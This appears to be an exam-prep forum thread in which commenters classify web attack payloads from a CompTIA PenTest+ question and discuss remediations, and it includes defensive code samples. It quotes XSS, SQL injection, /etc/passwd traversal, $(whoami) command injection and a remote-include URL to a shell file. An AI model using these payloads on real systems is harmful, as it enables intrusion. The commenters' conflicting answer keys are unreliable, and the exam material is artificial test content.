
Exam PT1-002 topic 1 question 7 discussion

Actual exam question from CompTIA's PT1-002
Question #: 7
Topic #: 1

HOTSPOT -
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS -
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:


Comments

timd
Highly Voted 3 years, 3 months ago
1. DOM XSS - input san. <,> https://portswigger.net/web-security/cross-site-scripting/dom-based
2. SQLi Stacked - Parameterized Queries
3. SQLi Union - Parameterized Queries
4. Reflected XSS - input san. <,> https://portswigger.net/web-security/cross-site-scripting/reflected
5. SQLi Error - Parameterized Queries https://www.indusface.com/blog/types-of-sql-injection/#Error_Based_SQL_Injection
6. CMD Injection - Input San. /,\ Sandbox
7. URL Redirect - Prevent ext. calls
8. Local File Inclusion - Input san. /,\ Sandbox
9. CMD Injection - input san. [,],(,)
10. Remote File Inclusion - input san. /,\ Sandbox
upvoted 24 times
Sweety_Certified7
8 months ago
For Payload 1 (#inner-tab"><script>alert(1)</script>): Given "You are a security analyst tasked with hardening a web server." Since the focus is on server hardening, addressing server-side vulnerabilities like Reflected XSS would be the main priority. Therefore, it's safe to conclude that Reflected XSS is the more appropriate choice in this server-focused context.
upvoted 1 times
[Removed]
2 years, 10 months ago
Thank you for your time and effort, this is definitely the best answer there is
upvoted 3 times
RightAsTain
2 years, 9 months ago
Verified every one in the book and looked up all the ASCII chars. Good to go. Thanks for making that one easy.
upvoted 4 times
MeisAdriano
Most Recent 11 months ago
1) #Inner-Tab = DOM XSS - Input sanitization (<> ...)
Explanation: "inner-tab" is a CSS id selector and can be used to identify an element in your HTML code in a unique way. It could be something like:
<div id="inner-tab">Some content inside here</div>
The code may use something like:
<script> document.getElementById('inner-tab').style.display = 'none'; </script>
Or in jQuery: $('#inner-tab').hide();
And you could attack via XSS by injecting into the DOM:
<script>document.getElementById('inner-tab').innerHTML = 'Changed via XSS attack';</script>
Solution: input sanitization of < and > will help to not include HTML tags.
upvoted 1 times
MeisAdriano
11 months ago
8) logfile=%2fetc%2fpasswd%00
Decoded it is: logfile=/etc/passwd, and at the end %00 terminates the string so that anything the application appends is ignored. In the real world we have to validate input, limit privilege, use secure APIs, escape input and parameterize queries.
Solution: input sanitization of / and \ so we can't browse across directories, but also "sandbox requests" to deny access to specific resources of the operating system.
upvoted 1 times
MeisAdriano
11 months ago
9) lookup=$(whoami)
Command injection: this scenario is trying to execute the *nix command "whoami".
Solution: we can solve it using a sandbox to deny access to specific commands of the operating system; that's the most appropriate answer.
upvoted 1 times
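One server-side way to handle the lookup parameter from payload 9, as an added example (not from the exam or any commenter here): the value is accepted only if it has the shape of a hostname, and the lookup tool is started through an argument vector rather than a shell string, so $(whoami) is never expanded. The nslookup invocation, the hostname regex and the echo_argument helper are assumptions for illustration.

```python
import re
import subprocess
import sys
from typing import List, Optional

# Hypothetical allow-list: a plain hostname (letters, digits, '-' and '.'), which
# rules out $(...), backticks, ';', '|' and whitespace before any command runs.
HOSTNAME = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


def build_lookup_argv(lookup: str) -> Optional[List[str]]:
    """Return the argv for the lookup tool, or None when the value is not a hostname."""
    if not HOSTNAME.match(lookup):
        return None
    # An argument vector (shell=False) goes straight to execve: no shell ever sees
    # the string, so nothing interprets $(whoami) as a subcommand.
    return ["nslookup", lookup]


def echo_argument(value: str) -> str:
    """Show that an argv element reaches the child process verbatim under shell=False.

    The Python interpreter stands in for nslookup so the demonstration runs anywhere.
    """
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.rstrip("\n")


if __name__ == "__main__":
    print(build_lookup_argv("$(whoami)"))    # None: refused before anything runs
    print(build_lookup_argv("example.com"))  # ['nslookup', 'example.com']
    print(echo_argument("$(whoami)"))        # the literal text, not a user name
```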
MeisAdriano
11 months ago
10) logfile=http:%2f%2fwww.malicious-site.cm%2fshell.txt (RFI)
Remote file inclusion: he is trying to show the txt on the screen, but that's a malicious shell, so it could be dangerous if included. Example:
<?php $logfile = $_GET['logfile']; include($logfile); ?>
Solution: preventing external calls
upvoted 1 times
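A hardened replacement for the include($_GET['logfile']) pattern discussed in comments 8 and 10, as an added example (not the exam's or any commenter's code): the parameter is decoded, refused if it carries a NUL byte, a path separator or a URL scheme, matched against an allow-list of log file names, and finally checked to resolve inside the log directory. The log directory, its contents and the SAFE_NAME pattern are constructed for the example.

```python
import os
import re
import tempfile
from typing import Optional
from urllib.parse import unquote

# Hypothetical allow-list for the logfile parameter: a bare file name ending in .log.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]*\.log$")


def make_log_dir() -> str:
    """Create a constructed log directory so the example runs offline."""
    base = tempfile.mkdtemp(prefix="applogs_")
    for name in ("access.log", "error.log"):
        with open(os.path.join(base, name), "w", encoding="utf-8") as fh:
            fh.write(f"sample line from {name}\n")
    return base


def resolve_logfile(base: str, logfile: str) -> Optional[str]:
    """Map the request parameter to a path inside `base`, or None to refuse it."""
    name = unquote(logfile)
    # Refuse NUL bytes (the %00 terminator), separators and URL schemes outright
    # rather than stripping them: stripping leaves room for encoding tricks.
    if "\x00" in name or "/" in name or "\\" in name or "://" in name:
        return None
    if not SAFE_NAME.match(name):
        return None
    root = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(root, name))
    # Defence in depth: after symlink resolution the file must still sit under root.
    if os.path.commonpath([candidate, root]) != root:
        return None
    return candidate if os.path.isfile(candidate) else None


def read_log(base: str, logfile: str) -> Optional[str]:
    """Serve only local, allow-listed files; remote URLs never reach an open() call."""
    path = resolve_logfile(base, logfile)
    if path is None:
        return None
    with open(path, encoding="utf-8") as fh:
        return fh.read()


# Payloads 8 and 10 from the exam question, as quoted in the comments above.
LFI_PAYLOAD = "%2fetc%2fpasswd%00"
RFI_PAYLOAD = "http:%2f%2fwww.malicious-site.cm%2fshell.txt"
```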
MeisAdriano
11 months ago
2) item=widget';waitfor%20delay%20'00:00:20';--
That's an example of SQL injection, for many reasons, one of them being that we see a double dash, which means "from here on is a comment" in SQL. SQL injection is a technique that exploits a web app that does not properly sanitize user input. In this situation the attacker is injecting an SQL instruction: WAITFOR DELAY '00:00:20'. The "stacked" word in "SQL Injection Stacked" means the attacker is trying to stack more SQL instructions into one single query.
Solution: Parameterized queries (in a real situation, I can't accept that a database web user should be granted permission to execute this kind of query...)
upvoted 1 times
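The parameterized-query remediation that the comments give for payloads 2, 3 and 5, shown as an added example (not from the exam or any commenter): the same item lookup written once by string concatenation and once with a bound parameter, run against a constructed SQLite table. The UNION payload is payload 3 adapted to SQLite, with sqlite_version() standing in for @@version; the table and its rows are invented for the example.

```python
import sqlite3
from typing import Dict, List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory catalogue so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (name TEXT, price REAL)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [("widget", 9.99), ("gadget", 19.99)])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, item: str) -> List[Tuple]:
    """The flawed pattern: the request value is pasted into the statement text."""
    sql = f"SELECT name, price FROM items WHERE name = '{item}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, item: str) -> List[Tuple]:
    """The remediation: the driver binds the value, which is never parsed as SQL."""
    return conn.execute(
        "SELECT name, price FROM items WHERE name = ?", (item,)
    ).fetchall()


# Payload 3 from the exam, adapted to SQLite (sqlite_version() instead of @@version).
UNION_PAYLOAD = "widget' UNION SELECT null, sqlite_version() --"


def run_demo() -> Dict[str, object]:
    conn = make_db()
    return {
        # Two rows: the real widget plus a row carrying the database engine version.
        "vulnerable": lookup_vulnerable(conn, UNION_PAYLOAD),
        # No item is literally named "widget' UNION SELECT ...", so nothing comes back.
        "parameterized": lookup_parameterized(conn, UNION_PAYLOAD),
        "legit": lookup_parameterized(conn, "widget"),
        "engine_version": sqlite3.sqlite_version,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```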
ResStapler
2 years, 9 months ago
This PBQ reminds me of Star Trek: The Kobayashi Maru, the No-Win Scenario. Knowing the answer 100% seems like the no-win scenario.
PAYLOAD = VULNERABILITY TYPE - REMEDIATION
01 #Inner-Tab = DOM XSS - Input sanitization (<> ...)
02 Item=Widget = SQL Injection STACKED - Parameterized Queries
03 Item=Widget%20 = SQLi UNION - Parameterized Queries
04 Search=BOB = Reflected XSS - Input sanitization (<> ...)
05 Item widget+ convert = SQLi error - Parameterized Queries
06 Site = www. Exa = Command Injection - Sandbox Requests
07 Redirect http: = URL redirect - Preventing External Calls
08 Logfile=%2 = Local File Inclusion - Input Sanitization $
09 Lookup =$(whoami) = Command Injection - Input Sanitization $ [] ()
10 Logfile =http = 2% = Remote File Inclusion - Input Sanitization /,\ Sandbox
upvoted 4 times
am2005
3 years, 2 months ago
Inner Tab = Reflected XSS - Input sanitization (<> ...)
Item= widget = SQL Injection (Stacked) - Parameterized Queries
Item=widget%20 = DOM XSS - Input Sanitization (<> ...)
Search=BOB = Local File Inclusion - sandbox req
Item widget+ convert = Command Injection - sandbox req
Site = www. Exa = SQLi (union) - parameterized queries
Redirect http: = SQLi (error) - parameterized queries
Log file =2% = Remote File Inclusion - sandbox
Lookup =$ = Command Injection - input sanitization $ []
Logfile =http = 2% = URL redirect - prevent external calls
upvoted 3 times
DrChats
3 years, 6 months ago
The correct answer is:
1. Reflected XSS - Input sanitization (<> ...)
2. SQL Injection Stacked - Parameterized Queries
3. DOM XSS - Input Sanitization (<> ...)
4. Local File Inclusion - sandbox req
5. Command Injection - sandbox req
6. SQLi union - parameterized queries
7. SQLi error - parameterized queries
8. Remote File Inclusion - sandbox
9. Command Injection - input sanitization $
10. URL redirect - prevent external calls
upvoted 3 times
DrChats
3 years, 6 months ago
I got them in the WRONG order
upvoted 2 times
DrChats
3 years, 6 months ago
These are the RIGHT numbers: 1 2 4 8 6 3 5 10 9 7.....
upvoted 6 times
some_specialist
3 years, 3 months ago
I took the above and merged it with the initial comment:
1. Reflected XSS - Input sanitization (<> ...)
2. SQL Injection Stacked - Parameterized Queries
3. Local File Inclusion - sandbox req
4. Remote File Inclusion - sandbox
5. SQLi union - parametrized queries
6. DOM XSS - Input Sanitization (<> ...)
7. Command Injection - sandbox req
8. URL redirect - prevent external calls
9. Command Injection - input sanitization $
10. SQLi error - parametrized queries
upvoted 5 times
rootlikegroot
2 years, 11 months ago
How can 3 (item=widget%20union%20select%20null, null, @@version; - -) be an LFI? This is a union attack.
upvoted 7 times
Davar39
3 years, 5 months ago
You are completely right, thank you for putting in the work.
upvoted 7 times
Picklefall1
3 years, 8 months ago
There is so much wrong with the revealed answer here that it's a bit much to type all of it out.
upvoted 3 times